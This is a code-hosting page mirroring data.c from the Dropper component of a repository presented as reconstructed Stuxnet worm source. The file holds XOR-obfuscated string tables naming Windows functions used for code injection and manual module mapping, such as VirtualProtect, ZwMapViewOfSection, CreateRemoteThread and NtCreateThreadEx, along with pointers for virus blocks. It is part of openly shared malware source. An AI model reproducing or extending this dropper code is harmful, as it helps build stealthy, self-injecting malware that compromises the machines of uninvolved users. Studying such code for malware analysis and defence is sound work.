github/stuxnet
1
1
Fork 0
mirror of https://github.com/micrictor/stuxnet.git synced 2026-01-08 22:18:11 -05:00
Code Issues Packages Projects Releases Wiki Activity
Files
master
stuxnet/Dropper/data.c
Michael R. Torres d374a08824 Massive restructure 
A lot of changes, some small some large.
Most notably, add in the rootkit source, courtesy of @Christian-Roggia

Closes https://github.com/micrictor/stuxnet/issues/1
2016-09-19 18:15:13 -07:00

197 lines
5.6 KiB
C
Raw Permalink Blame History

/******************************************************************************************
Copyright 2012-2013 Christian Roggia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
******************************************************************************************/
#include "data.h"
#pragma pack(push)
#pragma pack(4)
// KERNEL32.DLL.ASLR.%08x
const WCHAR ENCODED_KERNEL32_DLL_ASLR__08x[23] =
{
0xAE59, 0xAE57, 0xAE40, 0xAE5C,
0xAE57, 0xAE5E, 0xAE21, 0xAE20,
0xAE3C, 0xAE56, 0xAE5E, 0xAE5E,
0xAE3C, 0xAE53, 0xAE41, 0xAE5E,
0xAE40, 0xAE3C, 0xAE37, 0xAE22,
0xAE2A, 0xAE6A, 0xAE12
};
const char ENCODED_lstrcmpiW[20] =
{
0x7E, 0xAE, 0x61, 0xAE, 0x66, 0xAE, 0x60, 0xAE,
0x71, 0xAE, 0x7F, 0xAE, 0x62, 0xAE, 0x7B, 0xAE,
0x45, 0xAE, 0x12, 0xAE
};
const char ENCODED_VirtualQuery[26] =
{
0x44, 0xAE, 0x7B, 0xAE, 0x60, 0xAE, 0x66, 0xAE,
0x67, 0xAE, 0x73, 0xAE, 0x7E, 0xAE, 0x43, 0xAE,
0x67, 0xAE, 0x77, 0xAE, 0x60, 0xAE, 0x6B, 0xAE,
0x12, 0xAE
};
const char ENCODED_VirtualProtect[30] =
{
0x44, 0xAE, 0x7B, 0xAE, 0x60, 0xAE, 0x66, 0xAE,
0x67, 0xAE, 0x73, 0xAE, 0x7E, 0xAE, 0x42, 0xAE,
0x60, 0xAE, 0x7D, 0xAE, 0x66, 0xAE, 0x77, 0xAE,
0x71, 0xAE, 0x66, 0xAE, 0x12, 0xAE
};
const char ENCODED_GetProcAddress[30] =
{
0x55, 0xAE, 0x77, 0xAE, 0x66, 0xAE, 0x42, 0xAE,
0x60, 0xAE, 0x7D, 0xAE, 0x71, 0xAE, 0x53, 0xAE,
0x76, 0xAE, 0x76, 0xAE, 0x60, 0xAE, 0x77, 0xAE,
0x61, 0xAE, 0x61, 0xAE, 0x12, 0xAE
};
const char ENCODED_MapViewOfFile[28] =
{
0x5F, 0xAE, 0x73, 0xAE, 0x62, 0xAE, 0x44, 0xAE,
0x7B, 0xAE, 0x77, 0xAE, 0x65, 0xAE, 0x5D, 0xAE,
0x74, 0xAE, 0x54, 0xAE, 0x7B, 0xAE, 0x7E, 0xAE,
0x77, 0xAE, 0x12, 0xAE
};
const char ENCODED_UnmapViewOfFile[32] =
{
0x47, 0xAE, 0x7C, 0xAE, 0x7F, 0xAE, 0x73, 0xAE,
0x62, 0xAE, 0x44, 0xAE, 0x7B, 0xAE, 0x77, 0xAE,
0x65, 0xAE, 0x5D, 0xAE, 0x74, 0xAE, 0x54, 0xAE,
0x7B, 0xAE, 0x7E, 0xAE, 0x77, 0xAE, 0x12, 0xAE
};
const char ENCODED_FlushInstructionCache[44] =
{
0x54, 0xAE, 0x7E, 0xAE, 0x67, 0xAE, 0x61, 0xAE,
0x7A, 0xAE, 0x5B, 0xAE, 0x7C, 0xAE, 0x61, 0xAE,
0x66, 0xAE, 0x60, 0xAE, 0x67, 0xAE, 0x71, 0xAE,
0x66, 0xAE, 0x7B, 0xAE, 0x7D, 0xAE, 0x7C, 0xAE,
0x51, 0xAE, 0x73, 0xAE, 0x71, 0xAE, 0x7A, 0xAE,
0x77, 0xAE, 0x12, 0xAE
};
const char ENCODED_LoadLibraryW[26] =
{
0x5E, 0xAE, 0x7D, 0xAE, 0x73, 0xAE, 0x76, 0xAE,
0x5E, 0xAE, 0x7B, 0xAE, 0x70, 0xAE, 0x60, 0xAE,
0x73, 0xAE, 0x60, 0xAE, 0x6B, 0xAE, 0x45, 0xAE,
0x12, 0xAE
};
const char ENCODED_FreeLibrary[24] =
{
0x54, 0xAE, 0x60, 0xAE, 0x77, 0xAE, 0x77, 0xAE,
0x5E, 0xAE, 0x7B, 0xAE, 0x70, 0xAE, 0x60, 0xAE,
0x73, 0xAE, 0x60, 0xAE, 0x6B, 0xAE, 0x12, 0xAE
};
const char ENCODED_ZwCreateSection[32] =
{
0x48, 0xAE, 0x65, 0xAE, 0x51, 0xAE, 0x60, 0xAE,
0x77, 0xAE, 0x73, 0xAE, 0x66, 0xAE, 0x77, 0xAE,
0x41, 0xAE, 0x77, 0xAE, 0x71, 0xAE, 0x66, 0xAE,
0x7B, 0xAE, 0x7D, 0xAE, 0x7C, 0xAE, 0x12, 0xAE
};
const char ENCODED_ZwMapViewOfSection[38] =
{
0x48, 0xAE, 0x65, 0xAE, 0x5F, 0xAE, 0x73, 0xAE,
0x62, 0xAE, 0x44, 0xAE, 0x7B, 0xAE, 0x77, 0xAE,
0x65, 0xAE, 0x5D, 0xAE, 0x74, 0xAE, 0x41, 0xAE,
0x77, 0xAE, 0x71, 0xAE, 0x66, 0xAE, 0x7B, 0xAE,
0x7D, 0xAE, 0x7C, 0xAE, 0x12, 0xAE
};
const char ENCODED_CreateThread[26] =
{
0x51, 0xAE, 0x60, 0xAE, 0x77, 0xAE, 0x73, 0xAE,
0x66, 0xAE, 0x77, 0xAE, 0x46, 0xAE, 0x7A, 0xAE,
0x60, 0xAE, 0x77, 0xAE, 0x73, 0xAE, 0x76, 0xAE,
0x12, 0xAE
};
const char ENCODED_WaitForSingleObject[40] =
{
0x45, 0xAE, 0x73, 0xAE, 0x7B, 0xAE, 0x66, 0xAE,
0x54, 0xAE, 0x7D, 0xAE, 0x60, 0xAE, 0x41, 0xAE,
0x7B, 0xAE, 0x7C, 0xAE, 0x75, 0xAE, 0x7E, 0xAE,
0x77, 0xAE, 0x5D, 0xAE, 0x70, 0xAE, 0x78, 0xAE,
0x77, 0xAE, 0x71, 0xAE, 0x66, 0xAE, 0x12, 0xAE
};
const char ENCODED_GetExitCodeThread[36] =
{
0x55, 0xAE, 0x77, 0xAE, 0x66, 0xAE, 0x57, 0xAE,
0x6A, 0xAE, 0x7B, 0xAE, 0x66, 0xAE, 0x51, 0xAE,
0x7D, 0xAE, 0x76, 0xAE, 0x77, 0xAE, 0x46, 0xAE,
0x7A, 0xAE, 0x60, 0xAE, 0x77, 0xAE, 0x73, 0xAE,
0x76, 0xAE, 0x12, 0xAE
};
const char ENCODED_ZwClose[16] =
{
0x48, 0xAE, 0x65, 0xAE, 0x51, 0xAE, 0x7E, 0xAE,
0x7D, 0xAE, 0x61, 0xAE, 0x77, 0xAE, 0x12, 0xAE
};
const char ENCODED_CreateRemoteThread[38] =
{
0x51, 0xAE, 0x60, 0xAE, 0x77, 0xAE, 0x73, 0xAE,
0x66, 0xAE, 0x77, 0xAE, 0x40, 0xAE, 0x77, 0xAE,
0x7F, 0xAE, 0x7D, 0xAE, 0x66, 0xAE, 0x77, 0xAE,
0x46, 0xAE, 0x7A, 0xAE, 0x60, 0xAE, 0x77, 0xAE,
0x73, 0xAE, 0x76, 0xAE, 0x12, 0xAE
};
const char ENCODED_NtCreateThreadEx[34] =
{
0x5C, 0xAE, 0x66, 0xAE, 0x51, 0xAE, 0x60, 0xAE,
0x77, 0xAE, 0x73, 0xAE, 0x66, 0xAE, 0x77, 0xAE,
0x46, 0xAE, 0x7A, 0xAE, 0x60, 0xAE, 0x77, 0xAE,
0x73, 0xAE, 0x76, 0xAE, 0x57, 0xAE, 0x6A, 0xAE,
0x12, 0xAE
};
const WCHAR ENCODED_KERNEL32_DLL[13] =
{
0xAE79, 0xAE77, 0xAE60, 0xAE7C,
0xAE77, 0xAE7E, 0xAE21, 0xAE20,
0xAE3C, 0xAE76, 0xAE7E, 0xAE7E,
0xAE12
};
const WCHAR ENCODED_NTDLL_DLL[10] =
{
0xAE7C, 0xAE66, 0xAE76, 0xAE7E,
0xAE7E, 0xAE3C, 0xAE76, 0xAE7E,
0xAE7E, 0xAE12
};
#pragma pack(pop)
//const char szEncryptedSectionMark[5] = ".stub";
static BOOL bSetup = TRUE;
static PVOID s_ASMCodeBlocksPTR = 0;
static PVOID s_virusBlocksPTR = 0;
static PVOID s_codeBlockPTR = 0;
static HINSTANCE hINSTANCE = 0;
Reference in New Issue View Git Blame Copy Permalink